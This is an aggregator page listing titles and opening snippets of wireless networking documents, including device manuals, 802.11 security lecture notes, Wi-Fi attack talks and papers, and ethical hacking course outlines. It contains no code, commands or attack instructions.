NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012 NWD2705 Dual-Band Wireless N450 USB Adapter Version 1.00 Edition 1, 09/2012 Quick Start Guide User s Guide www.zyxel.com Copyright 2012 ZyXEL Communications Corporation IMPORTANT! READ CAREFULLY BEFORE

More information

PRODUCT GUIDE Wireless Intrusion Prevention Systems

PRODUCT GUIDE Wireless Intrusion Prevention Systems PRODUCT GUIDE Wireless Intrusion Prevention Systems The Need for Wireless INTRUSION PREVENTION SYSTEMS A Wireless Intrusion Prevention System (WIPS) is designed to address two classes of challenges facing

More information

How to configure a Point-to-Multipoint link

How to configure a Point-to-Multipoint link How to configure a Point-to-Multipoint link SilverNet equipment comes Pre-configured on IP addresses 192.168.0.229 or 192.168.0.228. There may be some instances where you need to reset the unit or the

More information

Light Mesh AP. User s Guide. 2009/2/20 v1.0 draft

Light Mesh AP. User s Guide. 2009/2/20 v1.0 draft Light Mesh AP User s Guide 2009/2/20 v1.0 draft i FCC Certifications This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to Part 15 of the FCC Rules.

More information

GETTING THE MOST OUT OF EVIL TWIN

GETTING THE MOST OUT OF EVIL TWIN GETTING THE MOST OUT OF EVIL TWIN B-SIDES ATHENS 2016 GEORGE CHATZISOFRONIOU (@_sophron) sophron@census-labs.com www.census-labs.com > WHOAMI Security Engineer at CENSUS S.A. Cryptography, Wi-Fi hacking,

More information

Wireless LAN Access Point

Wireless LAN Access Point Wireless LAN Access Point IEEE 802.11b 11Mbps User s Manual Table of Contents Chapter 1 Introduction... 1 1.1 Package Contents... 2 1.2 Features... 2 1.3 Specifications... 2 1.4 Physical Description...

More information

BackTrack 5 Wireless Penetration Testing

BackTrack 5 Wireless Penetration Testing BackTrack 5 Wireless Penetration Testing Beginner's Guide Master bleeding edge wireless testing techniques with BackTrack 5 Vivek Ramachandran [ PUBLISHING 1 open source I community experience distilled

More information

Nomadic Communications Labs

Nomadic Communications Labs Nomadic Communications Labs Alessandro Villani avillani@science.unitn.it Security And Wireless Network Wireless Security: Overview Open network Open network+ MAC-authentication Open network+ web based

More information

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder.

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder. Outline 18-759: Wireless Networks Lecture 10: 802.11 Management Peter Steenkiste Departments of Computer Science and Electrical and Computer Engineering Spring Semester 2016 http://www.cs.cmu.edu/~prs/wirelesss16/

More information

Nomadic Communications Labs. Alessandro Villani

Nomadic Communications Labs. Alessandro Villani Nomadic Communications Labs Alessandro Villani avillani@science.unitn.it Security And Wireless Network Wireless Security: Overview Open network Open network+ MAC-authentication Open network+ web based

More information

11N Wireless USB Adapter User Guide

11N Wireless USB Adapter User Guide -- 1 -- Copyright Statement is the registered trademark of Shenzhen Tenda Technology Co., Ltd. All the products and product names mentioned herein are the trademarks or registered trademarks of their respective

More information

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis CS-435 spring semester 2016 Network Technology & Programming Laboratory University of Crete Computer Science Department Stefanos Papadakis & Manolis Spanakis CS-435 Lecture preview 802.11 Security IEEE

More information

Chapter 24 Wireless Network Security

Chapter 24 Wireless Network Security Chapter 24 Wireless Network Security Wireless Security Key factors contributing to higher security risk of wireless networks compared to wired networks include: o Channel Wireless networking typically

More information

Hacking with Python. Your Guide to Ethical Hacking, Basic Security, Penetration Testing, and Python Hacking. Hacking Made Easy

Hacking with Python. Your Guide to Ethical Hacking, Basic Security, Penetration Testing, and Python Hacking. Hacking Made Easy Hacking with Python Your Guide to Ethical Hacking, Basic Security, Penetration Testing, and Python Hacking Hacking Made Easy Evan Lane Copyright 2017 Evan Lane. All rights reserved. Printed in the USA

More information

Hooray, w Is Ratified... So, What Does it Mean for Your WLAN?

Hooray, w Is Ratified... So, What Does it Mean for Your WLAN? Global Leader in Wireless Security Hooray, 802.11w Is Ratified... So, What Does it Mean for Your WLAN? A Brief Tutorial on IEEE 802.11w Gopinath K N and Hemant Chaskar AirTight Networks www.airtightnetworks.com

More information

A Division of Cisco Systems, Inc. GHz 2, g. Wireless-G. User Guide. Access Point WIRELESS WAP54G (EU/LA/UK) Model No.

A Division of Cisco Systems, Inc. GHz 2, g. Wireless-G. User Guide. Access Point WIRELESS WAP54G (EU/LA/UK) Model No. A Division of Cisco Systems, Inc. GHz 2,4 802.11g WIRELESS Wireless-G Access Point User Guide Model No. WAP54G (EU/LA/UK) Copyright and Trademarks Specifications are subject to change without notice. Linksys

More information

802.11b+g Wireless LAN USB Adapter. User Manual

802.11b+g Wireless LAN USB Adapter. User Manual 802.11b+g Wireless LAN USB Adapter User Manual REGULATORY STATEMENTS FCC Certification The United States Federal Communication Commission (FCC) and the Canadian Department of Communications have established

More information

Wireless Network Security

Wireless Network Security Wireless Network Security Wireless LAN Security Slide from 2 nd book 1 802.11 Wireless LAN Security Stations in LAN are connected physically while in WLAN any station in the radio range is connected, so

More information

Frequently Asked Questions WPA2 Vulnerability (KRACK)

Frequently Asked Questions WPA2 Vulnerability (KRACK) Frequently Asked Questions WPA2 Vulnerability (KRACK) Release Date: October 20, 2017 Document version: 1.0 What is the issue? A research paper disclosed serious vulnerabilities in the WPA and WPA2 key

More information

Wireless Networking. Dennis Rex SCALE 3X

Wireless Networking. Dennis Rex SCALE 3X Wireless Networking For Beginners Dennis Rex SCALE 3X - 2005 Agenda Wireless Choices 802.11A, B, G Devices - USB, PCI, PCMCIA, bridges Wireless chipsets - the good, the bad, the ugly Finding and installing

More information

1.0 Basic RF Characteristics (15%) 1.1 Describe RF signal characteristics Frequency Amplitude Phase 1.1.

1.0 Basic RF Characteristics (15%) 1.1 Describe RF signal characteristics Frequency Amplitude Phase 1.1. CWT 100 Objectives The Certified Wireless Technician (CWT) is an individual who can install APs based on a design document, configure the AP for initial operations and ensure connectivity. The individual

More information

Wi-Fi: a security overview

Wi-Fi: a security overview Wi-Fi: a security overview Pierre Pavlidès EURECOM - SysSec course December 15, 2017 Pierre Pavlidès EURECOM - SysSec course Wi-Fi: a security overview 1 / 60 Before we start Pierre Pavlidès @rogdham EURECOM

More information

WL-1100SD Wireless b SD Card

WL-1100SD Wireless b SD Card WL-1100SD Wireless 802.11b SD Card User s Guide Table of Contents Package Contents & System Requirements... 1 Package... 1 System Requirements... 1 Introducing SD WLAN Card Card... 1 SD WLAN Card features

More information

ECE 435 Network Engineering Lecture 8

ECE 435 Network Engineering Lecture 8 ECE 435 Network Engineering Lecture 8 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 26 September 2016 HW#3 was posted Announcements note the warnings you were getting on toupper()

More information

How to configure a Point-to-Point link

How to configure a Point-to-Point link How to configure a Point-to-Point link SilverNet equipment comes Pre-configured on IP addresses 192.168.0.229 or 192.168.0.228. There may be some instances where you need to reset the unit or the unit

More information

ISDP 2018 Industry Skill Development Program In association with

ISDP 2018 Industry Skill Development Program In association with ISDP 2018 Industry Skill Development Program In association with Penetration Testing What is penetration testing? Penetration testing is simply an assessment in a industry computer network to test the

More information

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo ETHICAL HACKING (CEH) CURRICULUM Introduction to Ethical Hacking What is Hacking? Who is a Hacker? Skills of a Hacker? Types of Hackers? What are the Ethics and Legality?? Who are at the risk of Hacking

More information

What is Eavedropping?

What is Eavedropping? WLAN Security What is Eavedropping? War Driving War Driving refers to someone driving around with a laptop and an 802.11 client card looking for an 802.11 system to exploit. War Walking Someone walks

More information

NETWORK SECURITY. Ch. 3: Network Attacks

NETWORK SECURITY. Ch. 3: Network Attacks NETWORK SECURITY Ch. 3: Network Attacks Contents 3.1 Network Vulnerabilities 3.1.1 Media-Based 3.1.2 Network Device 3.2 Categories of Attacks 3.3 Methods of Network Attacks 03 NETWORK ATTACKS 2 3.1 Network

More information

Wireless LAN USB Adaptor WL-2111 Quick Installation Guide V.1.0

Wireless LAN USB Adaptor WL-2111 Quick Installation Guide V.1.0 Wireless LAN USB Adaptor WL-2111 Quick Installation Guide V.1.0 Copyright Copyright 2001, All rights reserved. This manual and software described in it are copyrighted with all rights reserved. This manual

More information

Learn How to Configure EnGenius Wi-Fi Products for Popular Applications

Learn How to Configure EnGenius Wi-Fi Products for Popular Applications Learn How to Configure EnGenius Wi-Fi Products for Popular Applications Operation Modes Access Point (AP) / WDS AP Client Bridge (CB) Repeater WDS Bridge Client Router AP Router Access Point An access

More information

PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year

PASS4TEST. IT Certification Guaranteed, The Easy Way!   We offer free update service for one year PASS4TEST \ http://www.pass4test.com We offer free update service for one year Exam : 312-50v9 Title : Certified Ethical Hacker v9 Exam Vendor : EC-COUNCIL Version : DEMO Get Latest & Valid 312-50v9 Exam's

More information

EAPeak - Wireless 802.1X EAP Identification and Foot Printing Tool. Matt Neely and Spencer McIntyre

EAPeak - Wireless 802.1X EAP Identification and Foot Printing Tool. Matt Neely and Spencer McIntyre EAPeak - Wireless 802.1X EAP Identification and Foot Printing Tool Matt Neely and Spencer McIntyre SecureState 2011 Synopsis In this paper we present how to determine the EAP type used by an 802.11 network

More information

WI-FI HUB+ TROUBLESHOOTING GUIDE

WI-FI HUB+ TROUBLESHOOTING GUIDE WI-FI HUB+ TROUBLESHOOTING GUIDE Overview This guide is here to provide some answers to some commonly asked questions about your Wi-Fi Hub+. Tip: you can connect to your Wi-Fi Hub+ using an Ethernet cable

More information

VLANs and Association Redirection. Jon Ellch

VLANs and Association Redirection. Jon Ellch 802.11 VLANs and Association Redirection Jon Ellch Contents 1 Foreword 2 2 Background 3 3 Introduction 4 3.1 The state of the art......................................... 4 4 PVLANs and virtual BSSIDs

More information

U S E R M A N U A L b/g PC CARD

U S E R M A N U A L b/g PC CARD U S E R M A N U A L 802.11b/g PC CARD Table of Content CHAPTER 1 INTRODUCTION... 1 1.1 WIRELESS LAN FEATURE FUNCTIONS... 1 1.2 REGULATORY NOTICE... 1 1.2.1 FCC Class B Statement...1 1.2.2 Canadian Regulatory

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may

More information

Appendix E Wireless Networking Basics

Appendix E Wireless Networking Basics Appendix E Wireless Networking Basics This chapter provides an overview of Wireless networking. Wireless Networking Overview The FWG114P v2 Wireless Firewall/Print Server conforms to the Institute of Electrical

More information

Content. Chapter 1 Product Introduction Package Contents Product Features Product Usage... 2

Content. Chapter 1 Product Introduction Package Contents Product Features Product Usage... 2 Content Chapter 1 Product Introduction... 2 1.1 Package Contents... 2 1.2 Product Features... 2 1.3 Product Usage... 2 1.4 Before Installation... 2 1.5 Disable other manufacturers wireless network adapters...

More information

CE MARK WARNING LIMITED WARRANTY

CE MARK WARNING LIMITED WARRANTY CE MARK WARNING This is a Class B product. In a domestic environment, this product may cause radio interference, in which case the user may be required to take adequate measures. LIMITED WARRANTY Hawking

More information

Managing Rogue Devices

Managing Rogue Devices Finding Feature Information, page 1 Information About Rogue Devices, page 1 How to Configure Rogue Detection, page 6 Monitoring Rogue Detection, page 8 Examples: Rogue Detection Configuration, page 9 Additional

More information

A Division of Cisco Systems, Inc. GHz g. Wireless-G. USB Network Adapter. User Guide WIRELESS WUSB54G. Model No.

A Division of Cisco Systems, Inc. GHz g. Wireless-G. USB Network Adapter. User Guide WIRELESS WUSB54G. Model No. A Division of Cisco Systems, Inc. GHz 2.4 802.11g WIRELESS Wireless-G USB Network Adapter User Guide Model No. WUSB54G Copyright and Trademarks Specifications are subject to change without notice. Linksys

More information

Network Security. Security in local-area networks. Radboud University Nijmegen, The Netherlands. Autumn 2014

Network Security. Security in local-area networks. Radboud University Nijmegen, The Netherlands. Autumn 2014 Network Security Security in local-area networks Radboud University Nijmegen, The Netherlands Autumn 2014 Announcement Exercise class (werkcollege) time and room changed: Friday, 15:30-17:30, in LIN 8

More information

Configuring Layer2 Security

Configuring Layer2 Security Prerequisites for Layer 2 Security, page 1 Configuring Static WEP Keys (CLI), page 2 Configuring Dynamic 802.1X Keys and Authorization (CLI), page 2 Configuring 802.11r BSS Fast Transition, page 3 Configuring

More information

Encrypted WiFi packet injection and circumventing wireless intrusion prevention systems

Encrypted WiFi packet injection and circumventing wireless intrusion prevention systems Encrypted WiFi packet injection and circumventing wireless intrusion prevention systems White Paper Tim de Waal - 2015 Table of contents 1. Introduction 2. Proposed attack 2.1. Attack outline 2.2. Attack

More information

ProbeQuest Documentation

ProbeQuest Documentation ProbeQuest Documentation Release 0.7.0 Paul-Emmanuel Raoul Oct 08, 2018 Table of Contents 1 What are Wi-Fi probe requests? 3 2 Installation 5 2.1 Using pip (recommended)........................................

More information

Vulnerability issues on research in WLAN encryption algorithms WEP WPA/WPA2 Personal

Vulnerability issues on research in WLAN encryption algorithms WEP WPA/WPA2 Personal Vulnerability issues on research in WLAN encryption algorithms WEP WPA/WPA2 Personal Lazaridis Ioannis, Pouros Sotirios, Veloudis Simeon DEI College, Thessaloniki, Greece Abstract: This paper presents

More information

WIDS Technology White Paper

WIDS Technology White Paper Technical white paper WIDS Technology White Paper Table of contents Overview... 2 Background... 2 Functions... 2 Rogue detection implementation... 2 Concepts... 2 Operating mechanism... 2 Operating modes...

More information

Network Encryption 3 4/20/17

Network Encryption 3 4/20/17 The Network Layer Network Encryption 3 CSC362, Information Security most of the security mechanisms we have surveyed were developed for application- specific needs electronic mail: PGP, S/MIME client/server

More information

Wireless Hacking How to Hack Wireless Networks Beginner s Guide

Wireless Hacking How to Hack Wireless Networks Beginner s Guide Wireless Hacking How to Hack Wireless Networks Beginner s Guide Evan Lane Copyright 2017 Evan Lane. All rights reserved. Printed in the USA The information in this book represents only the view of the

More information

WUG2690 User s Manual

WUG2690 User s Manual 802.11b+g Wireless LAN USB Adapter WUG2690 User s Manual Federal Communication Commission Interference Statement This equipment has been tested and found to comply with the limits for a Class B digital

More information

Managing Rogue Devices

Managing Rogue Devices Information About Rogue Devices, page 1 Configuring Rogue Detection (GUI), page 5 Configuring Rogue Detection (CLI), page 8 Information About Rogue Devices Rogue access points can disrupt wireless LAN

More information

Wireless Networking Basics. Ed Crowley

Wireless Networking Basics. Ed Crowley Wireless Networking Basics Ed Crowley 2014 Today s Topics Wireless Networking Economic drivers and Vulnerabilities IEEE 802.11 Family WLAN Operational Modes Wired Equivalent Privacy (WEP) WPA and WPA2

More information

ETHICAL HACKING & COMPUTER FORENSIC SECURITY

ETHICAL HACKING & COMPUTER FORENSIC SECURITY ETHICAL HACKING & COMPUTER FORENSIC SECURITY Course Description From forensic computing to network security, the course covers a wide range of subjects. You will learn about web hacking, password cracking,

More information

Wireless LANs. ITS 413 Internet Technologies and Applications

Wireless LANs. ITS 413 Internet Technologies and Applications Wireless LANs ITS 413 Internet Technologies and Applications Aim: Aim and Contents Understand how IEEE 802.11 wireless LANs work Understand what influences the performance of wireless LANs Contents: IEEE

More information

Procedure: You can find the problem sheet on the Desktop of the lab PCs.

Procedure: You can find the problem sheet on the Desktop of the lab PCs. University of Jordan Faculty of Engineering & Technology Computer Engineering Department Computer Advance Networks Laboratory 907529 Lab.3 WLAN Security Objectives 1. Configure administrator accounts.

More information